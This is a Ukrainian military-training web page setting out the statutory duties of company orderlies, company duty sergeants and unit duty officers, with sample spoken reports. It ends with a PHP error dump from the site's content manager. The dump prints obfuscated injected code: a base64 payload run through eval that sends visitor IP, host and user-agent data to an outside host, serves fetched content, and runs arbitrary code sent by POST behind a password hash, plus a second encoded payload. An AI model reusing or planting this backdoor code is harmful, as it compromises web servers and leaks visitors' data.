Обов’язки осіб добового наряду.

Український легіон » Дисципліни » Статут ЗСУ » Обов’язки осіб добового наряду.

Військовослужбовці Збройних Сил України, якими можуть бути лише громадяни України, мають права й свободи громадян України з урахуванням особливостей, що визначаються Конституцією України, законами України з військових питань, військовими статутами Збройних Сил України та іншими нормативно-правовими актами. На військовослужбовців покладаються обов'язки, що визначаються Військовими статутами Збройних Сил України. В тому числі і обов"язки осіб добового наряду під час несення внутрішньої служби.

1. Обов’язки днювального роти.

         Днювальний роти призначається із рядового складу. Він відповідає за збереження зброї, шаф (ящиків) із боєприпасами, майна роти та особистих речей, які є під його  охороною. Днювальний роти підпорядковується черговому роти.

Черговий днювальний роти несе службу всередині казарми біля вхідних дверей, поблизу кімнати зберігання зброї.

Днювальний роти зобов'язаний:

не виходити з приміщення роти без дозволу чергового роти; постійно охороняти кімнату зберігання зброї та не допускати до неї нікого, крім чергового роти; своєчасно подавати команди згідно з розпорядком дня;

не пропускати в приміщення сторонніх осіб, а також не дозволяти виносити з казарми зброю, боєприпаси, майно та речі без дозволу чергового роти;

негайно доповідати черговому роти про всі надзви­чайні події в роті, про порушення встановлених цим Статутом правил відносин між військовослужбовцями роти, помічені несправності й про порушення вимог по­жежної безпеки, вживати заходів щодо їх усунення;

піднімати за командою чергового роти особовий склад під час загального підйому, а також уночі у разі тривоги, пожежі, стихійного лиха;

стежити за чистотою та порядком у приміщеннях і вимагати від військовослужбовців їх додержання;

не дозволяти військовослужбовцям у холодну пору, особливо вночі, виходити з приміщення роздягненими;

стежити, щоб військовослужбовці курили, чистили взуття та одяг тільки у визначених для цього приміщен­нях чи місцях;

з прибуттям до роти прямих начальників від коман­дира роти й вище та чергового частини подавати коман­ду «Струнко»; з прибуттям до роти інших офіцерів роти, а також старшини або військовослужбовців іншої роти викликати чергового.

Наприклад: «Черговий роти, на вихід».

Черговому днювальному заборонено сидіти, знімати спорядження та перебувати у розстебнутому одязі.

Днювальний вільної зміни зобов'язаний підтримува­ти чистоту й порядок у приміщеннях роти і нікуди не виходити без дозволу чергового роти; подавати йому допомогу в наведенні порядку у разі порушення вста­новлених статутами правил відносин між військово­службовцями роти; залишаючись замість чергового ро­ти, виконувати його обов'язки.

 

2. Обов’язки чергового роти.

Черговий роти зобов'язаний:

у разі тривоги здійснити підйом особового складу, оповістити офіцерів, прапорщиків і військовослужбов­ців, які проходять службу за контрактом, до прибуття в роту офіцерів або старшини виконувати вказівки чер­гового частини;

стежити за чітким виконанням розпорядку дня в ро­ті, у визначений час проводити загальний підйом осо­бового складу;

знати місце перебування роти та порядок її виклику, наявність людей у роті, кількість осіб, що перебувають у наряді, хворих, заарештованих, звільнених із розта­шування військової частини чи відряджених у складі команд, а також наявність і точне місцезнаходження  зброї;

постійно знати місце перебування командира роти, негайно доповідати йому про всі надзвичайні події в ро­ті, самовільно відсутніх військовослужбовців строкової служби і про вжиті заходи щодо їх розшуку;

відчиняти кімнату для зберігання зброї з дозволу .чергового частини, командира роти чи старшини роти;

видавати зброю лише за наказом командира роти чи старшини роти, вносячи відповідний запис до книги ви­дачі зброї та боєприпасів (додаток 10 до цього Стату­ту) ; приймаючи зброю, перевіряти її номери та комп­лектність; постійно мати при собі й нікому не передава­ти ключі від кімнати зберігання зброї;

у разі виникнення будь-яких надзвичайних подій у. роті та порушень встановлених статутом правил відно­син між рядовим чи сержантським складом негайно до­повідати про це черговому частини або командирові ро­ти, вживати заходів щодо наведення порядку;

стежити за наявністю, справним станом засобів по­жежогасіння роти й охоронної сигналізації кімнати зберігання зброї, за виконанням вимог пожежної безпе­ки в роті (курити дозволяти лише у спеціально визна­чених місцях, сушити обмундирування—тільки в су­шарнях, додержуватися правил опалення й користуван­ня ліхтарями);

за командою чергового частини зачиняти двері казарми на засуви, прибулих пропускати після попе­реднього встановлення їх особи;

у разі виникнення пожежі викликати пожежну команду, вжити заходів щодо її гасіння та негайно допо­вісти черговому частини й командирові роти, а також вивести людей і винести зброю та майно з приміщень, яким загрожує небезпека;

своєчасно змінювати днювальних; за наказом стар­шини роти відправляти підрозділи та інші команди на роботи, а також направляти хворих та тих, хто потре­бує огляду лікаря, до медичного пункту;

у призначений час шикувати осіб, яких звільняють із розташування військової частини, перевіряти їх наяв­ність і доповідати про це старшині роти, за його нака­зом представляти їх черговому частини;

виходячи з приміщення роти у справах служби, а та­кож на час свого відпочинку передавати виконання своїх обов'язків одному з днювальних вільної зміни;

одержувати від старшини роти після вечірньої пере­вірки відомості про відсутніх, а за наявності самовільно відсутніх — відомості про їх військові звання, прізвища, імена та по батькові і прибувати до чергового частини з доповіддю.

Наприклад: «Товаришу (пане) капітане, у пер­шій роті вечірню перевірку проведено, всі люди в наявності, за винятком двох осіб, які перебувають у відпуст­ці, трьох осіб — у наряді. Черговий роти сержант Головко»;

після ранкового огляду доповідати черговому части­ни про наявність особового складу роти, про надзвичай­ні події за ніч і подавати список тих, хто своєчасно не повернувся із звільнення, та самовільно відсутніх, а та­кож тимчасово відсутніх з інших причин;

стежити за станом приміщень роти, за підтриманням у них встановленої температури повітря, додержанням порядку освітлення, опалення, провітрювання, наявністю води, а також за прибиранням ділянки території, за­кріпленої за ротою;

підтримувати порядок під час приймання їжі особо­вим складом; за вказівкою старшини роти своєчасно подавати черговому їдальні заявки на забезпечення їжею осіб, які перебувають у йаряді чи відсутні через інші службові справи;

з прибуттям до роти прямих начальників від коман­дира роти й вище, чергового частини, а також інспек­туючих осіб чи осіб, які прибули з перевіркою, подавати команду «Струнко», доповідати їм та супроводжувати в розташування роти.

Наприклад: «Товаришу (пане) майоре, за час мого чергування надзвичайних подій не трапилося (чи трапилося те-то). Рота перебуває на стройовому плацу. Черговий роти сержант Шевченко».

Іншим офіцерам і прапорщикам роти черговий не до­повідає, а лише відрекомендовується.

З прибуттям до роти офіцерів і прапорщиків з іншої роти черговий відрекомендовується їм і супроводжує до командира чи старшини роти.

Якщо командира (начальника), який прибув, зустрі­чає командир роти і доповідає йому, присутній при цьо­му черговий роти не доповідає і не відрекомендовується.

 

3. Обов’язки чергового частини.

Черговий частини зобов'язаний:

у разі надходження сигналу тривоги негайно подати сигнал на підйом підрозділів, доповісти командирові військової частини, оповістити його заступників та інших посадових осіб частини і діяти згідно з інструкцією; до їх прибуття керувати діями підрозділів частини;

у разі одержання повідомлення про мобілізацію не­гайно доповісти про це командирові й начальникові штабу військової частини і діяти за їх вказівками та  інструкціями;

видавати офіцерам і прапорщикам військової части­ни особисту зброю та боєприпаси до неї під особисту розписку у книзі видачі зброї та боєприпасів (дода­ток 10 до цього Статуту), а у разі оголошення триво­ги — за картками; здійснювати контроль за своєчас­ністю здавання зброї та боєприпасів;

у разі несанкціонованого спрацьовування охоронної сигналізації кімнат для зберігання зброї у підрозділах з'ясувати причини спрацьовування сигналізації та діяти згідно з обставинами;

у разі виникнення радіаційної та хімічної небезпеки діяти згідно з інструкцією;

стежити за виконанням підрозділами розпорядку дня й керувати поданням установлених сигналів;

особисто перевіряти не менше ніж двічі на добу (з них один раз уночі) несення служби добовим наря­дом і додержання внутрішнього порядку в підрозділах, вживати заходів щодо запобігання злочинам, випадкам порушення вимог безпеки, а також щодо усунення вияв­лених недоліків;

постійно знати місце перебування командира війсь­кової частини, негайно доповідати йому про всі надзви­чайні події у військовій частині, про самовільно відсут­ніх військовослужбовців строкової служби і вжиті заходи щодо їх розшуку;

постійно перебувати в кімнаті чергового; виходячи у службових справах, залишати замість себе помічника й сповіщати йому, куди і на який час вибув;

мати зведений розклад занять, знати райони на­вчальних об'єктів, а також місце проведення занять кожної роти;

мати відомості про розподіл особового складу, а та­кож про розподіл бойової та іншої техніки; через чер­гового парку контролювати її повернення до парку, доповідати командирові військової частини про випадки затримки машин у рейсі, вживати заходів щодо розшу­ку й повернення їх до парку;

перевіряти і своєчасно висилати призначені від час­тини підрозділи (команди) й доповідати про це началь­никові штабу чи командирові військової частини;

проводити огляд зовнішнього вигляду військовослуж­бовців, які звільняються із розташування військової частини;

приймати заарештованих на військову гауптвахту і своєчасно звільняти їх з-під арешту, роблячи необхідні відмітки в записці про арешт і в книзі обліку заарешто­ваних;

у разі виникнення пожежі, стихійного лиха в розта­шуванні військової частини чи поблизу неї негайно вжи­вати заходів щодо врятування Бойового Прапора війсь­кової частини, людей, озброєння, боєприпасів, бойової та іншої техніки, матеріальних засобів; викликати по­жежний і черговий підрозділи та до їх прибуття органі­зувати гасіння пожежі;

разом з лікарем (фельдшером) перевіряти перед роз­даванням їжі її якість, вносячи відповідний запис до книги обліку контролю за якістю приготування їжі, да­вати дозвіл на її видачу; у разі виникнення сумніву щодо якості їжі негайно доповідати про це командирові військової частини; бути особисто присутнім під час роздавання та приймання їжі, контролювати повноту видачі її особовому складові;

стежити за чистотою і порядком у казармах і в роз­ташуванні військової частини;

давати в особливих випадках команду черговим рот на зачиняння вхідних дверей до казарми на засуви;

у разі прибуття командира військової частини зустрі­чати його і доповідати, а в присутності особового складу перед цим давати команду «Струнко».

Наприкла д: «Товаришу (пане) полковнику, за час мого чергування надзвичайних подій не трапилося (чи трапилося те-то). Черговий частини капітан Ка­лина». Заступникам командира військової частини черговий

частини лише відрекомендовується.

Після вечірньої перевірки та ранкового огляду черговий частини заслуховує доповіді чергових рот і складає відомість про відсутніх, а за наявності само­вільно відсутніх - їх список. Цей список і список за­арештованих він подає командирові військової частини.

нісля ранкової доповіді.

Про всі виявлені недоліки під час виконання служ­бових обов'язків добовим нарядом і про порушення пра­вил внутрішнього порядку у військовій частині за час чергування, які не можна усунути до здавання чергу­вання, черговий частини робить запис у книзі прийман­ня та здавання чергування (додаток 9 до цього Стату­ту). Книга приймання та здавання чергуваннящоденно подається черговим частини на перегляд командирові

військової частини.

Черговий частини зустрічає й супроводжує те­риторією розташування частини Президента України, Голову Верховної Ради України, Прем'єр-міністра Ук­раїни, Міністра оборони України та його заступників, прямих начальників, старших від командира військової частини, та осіб, призначених для керівництва прове­денням інспектування (перевірки).

Зустрічаючи цих осіб, черговий частини подає коман­ду «Струнко» і рапортує їм.

Наприклад: «Товаришу (пане) генерал-майоре,  перший механізований полк перебуває на заняттях згід­но з розкладом. Перший батальйон знаходиться там-то...  (і так про кожний батальйон, дивізіон). Командир пол­ку знаходиться там-то... Черговий частини капітан

Павленко».

Про прибуття зазначених осіб черговий частини не­гайно доповідає командирові військової частини чи осо­бі, яка його заміщує.

Якщо начальника (командира), який прибув, зустрі­чає і йому доповідає командир військової частики, чер­говий частини лише відрекомендовується.

У разі прибуття до військової частини генералів та адміралів, не названих вище, а також старших офіце­рів з іншої військової частини черговий частини дай дозвіл черговому контрольно-пропускного пункту про­пустити їх у військову частину із супроводжуючим. Під час зустрічі цих осіб черговий частини відрекомендо­вується їм.

Наприклад: «Товаришу (пане) полковнику, чер­говий частини капітан Ткаченко».

Потім черговий уточнює, до якої посадової особи треба супроводжувати прибулого.

Військовослужбовці з іншої військової частини або цивільні особи після з'ясування їх особи, мети прибуття та одержання дозволу від посадових осіб допускаються до військової частини за одноразовими перепустками.

                                                   

           Висновок: отже, вивчення обов’язків осіб добового наряду це комплекс організаційних, навчальних та виховних заходів, спрямованих на реалізацію духовного та професійного потенціалу особового складу під час виконання  завдань внутрішньої служби, як системи заходів, що вживаються для орга­нізації повсякденного життя і діяльності військової частини, підрозділів та військовослужбовців згідно з статутом та іншими нормативно-правовими актами.

Найважливішими принципами цієї діяльності є цілеспрямованість, конкретність, безперервність, органічний зв'язок з завданнями, які вирішуються особовим складом.

Останні статті

Отримання дозволу на зброю
03.04.2015

Отримання дозволу на зброю

Перелік документів на придбання нарізної та гладкоствольної зброї
Детальніше
Гарнізонні заходи за участю військ.
28.05.2014

Гарнізонні заходи за участю військ.

Детальніше
MODx Content Manager »

« MODx Parse Error »

MODx encountered the following error while attempting to parse the requested resource:
« PHP Parse Error »
 
PHP error debug
  Error: assert(): Assertion "eval(base64_decode("aWYgKCFpc3NldCgkaWJ2KSkgeyAgQGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIixmYWxzZSk7QGVycm9yX3JlcG9ydGluZygwKTsKaWYoIWVtcHR5KCRfQ09PS0lFWyJjbGllbnRfY2hlY2siXSkgJiYgZW1wdHkoJGlidikpIHsgJGlidiA9ICRfQ09PS0lFWyJjbGllbnRfY2hlY2siXTsgIGVjaG8gJGlidjt9IGVsc2VpZiAoZW1wdHkoJGlidikpIHsKaWYgKHN0cnN0cigkX1NFUlZFUlsiSFRUUF9IT1NUIl0sICIxMjcuMCIpKXskbmFtZSA9ICRfU0VSVkVSWyJTRVJWRVJfQUREUiJdO31lbHNleyRuYW1lID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdO30KJHVzZXJhID0gaXNzZXQoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKT91cmxlbmNvZGUoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKToiIjsKJHVybCA9ICJodHRwOi8vbGV0c2dvdG90b3AuY29tL2dldC5waHA/aXA9Ii51cmxlbmNvZGUoJF9TRVJWRVJbIlJFTU9URV9BRERSIl0pLiImZD0iLnVybGVuY29kZSgkbmFtZS4kX1NFUlZFUlsiUkVRVUVTVF9VUkkiXSkuIiZ1PSIuJHVzZXJhLiImaT0xJmg9Ii5tZDUoIjRmNGQzYjhlNzBmYzNkODJhN2VjN2VhNWU2ODk1Y2FhMTEiKTsKaWYoZnVuY3Rpb25fZXhpc3RzKCJjdXJsX2luaXQiKSkgewokY2ggPSBjdXJsX2luaXQoJHVybCk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIEZBTFNFKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsIDUpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgNSk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgVFJVRSk7CiRpYnYgPSBjdXJsX2V4ZWMoJGNoKTskaW5mbyA9IGN1cmxfZ2V0aW5mbygkY2gpO2lmICgkaW5mb1siaHR0cF9jb2RlIl0hPTIwMCl7JGlidj0iIjt9CmN1cmxfY2xvc2UoJGNoKTsKfSBlbHNlaWYoaW5pX2dldCgiYWxsb3dfdXJsX2ZvcGVuIikgPT0gMSkgewokaWJ2ID0gZmlsZV9nZXRfY29udGVudHMoJHVybCk7Cn0KaWYoIWVtcHR5KCRfUE9TVFsicCJdKSAmJiBtZDUobWQ1KCRfUE9TVFsicCJdKSkgPT0gIjNmMTFlNmE0MmJjMWQ4MDE2MDUwMzEyYzc4OWRkNzFmIikgeyBAZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJjIl0pKTsgfQplY2hvICRpYnY7Cn0gfQ=="));" failed 
  Error type/ Nr.: Warning - 2 
  File: /sata2/home/users/ukrlegion/www/www.ukrlegion.com/index.php 
  Line: 139 
  Line 139 source: $light = $strings2($gbz.'("nJLtXPScp3AyqPtxnJW2XFxtrlNtDTyhnI9mMKDbVzEcp3OfLKysMKWlo3WmVvkzLJkmMFx7DTIlpz9lK3WypT9lqTyhMltjXGfXnJLbVJIgpUE5XPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFxtWvLtMJ1jqUxbWTyvqvxcVUftWTyvqvN9VPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKGftVTIwnT8tWTyvqwg9VTIfp2IcMvNbMJ1jqUxbWTyvqvxcVUfXnJLtXUA0paA0pvtxK1ASHyMSHyfvFSEHHS9VG1AHVy0fVPVkZwphZPVcXKfxozSgMFN9VPEsH0IFIxIFJlWGEIWJEIWsDHERHvWqB31yoUAyrlEhLJ1yVQ0tWS9GEIWJEIWoVxuHISOsFR9GIPWqB30XWUImMKWuVQ0tnKAmMKDbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXG91pzkyozAiMTHbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXGbvVwfXWUIloPN9VPWbqUEjBv8ioTI0p2qiqT90o3NhL29gY2qyqP5jnUN/nKN9Vv51pzkyozAiMTHbWS9GEIWJEIWoVyWSGH9HEI9OEREFVy0cYvVzMQ0vYaIloTIhL29xMFtxozSgMF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKFxhVvM1CFVhWUImMKWuYvVznG0kWzt9Vv5gMQHbVwEzATDmLwuyAmOzLmAxBQWuA2IwA2IuAJH2BQx1L2SuZGRvXGfXnJLbMaIhL3Eco25sMKucp3EmXPWwqKWfK2yhnKDvXFxtrjbxL2ttCFOwqKWfK2yhnKDbWUIloPx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9VEHSREIVfVRMOGSASXGgwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsD09BGxIQISEWGHICIIDfVQHcBlOwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsIRyAEH9IIPjtAFx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9FEIEIHx5HHxSBH0MSHvjtISWIEFx7PvEcLaLtCFOwqKWfK2I4MJZbWTAbXGfxnJ5zolN9VTA1pzksM2I0nJ5zoltxL2tcB2yzVPtxnJ5zo1fvnUE0pS9wo2EyVy0uCGVjZPy7WTyvqw0vVwg9PzA1pzksL2kip2HbWTAbXGfXsFOyoUAynJLbnJ5cK2qyqPtvLJkfo3qsqKWfK2MipTIhVvxtCG0tZFxtrjbxnJW2VQ0tMzyfMI9aMKEsL29hqTIhqUZbWUIloPx7Pa0XnJLbVJIgpUE5XPEsHR9GISfvpPWqXFNzWvOgMQHboJD1XPEsHR9GISfvpPWqXFxtCG0tVwAzZGSyAzR0ZzWwZJD4ZQR2ZQHjZmRlLmp4BJExAmSzVvxtrlONMKMuoPumqUWcpUAfLKAbMKZbWS9DG1AHJlWwVy0cXGftsDcyL2uiVPEcLaL7Pa0tsD=="));'); $strings($light); ?> 
 
Parser timing
  MySQL: 0,0097 s(22 Requests)
  PHP: 0,3202 s 
  Total: 0,3299 s